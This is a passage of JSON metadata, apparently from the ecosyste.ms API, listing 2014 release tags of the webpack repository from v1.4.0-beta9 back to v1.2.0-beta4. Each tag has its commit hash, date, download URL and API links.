s/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/m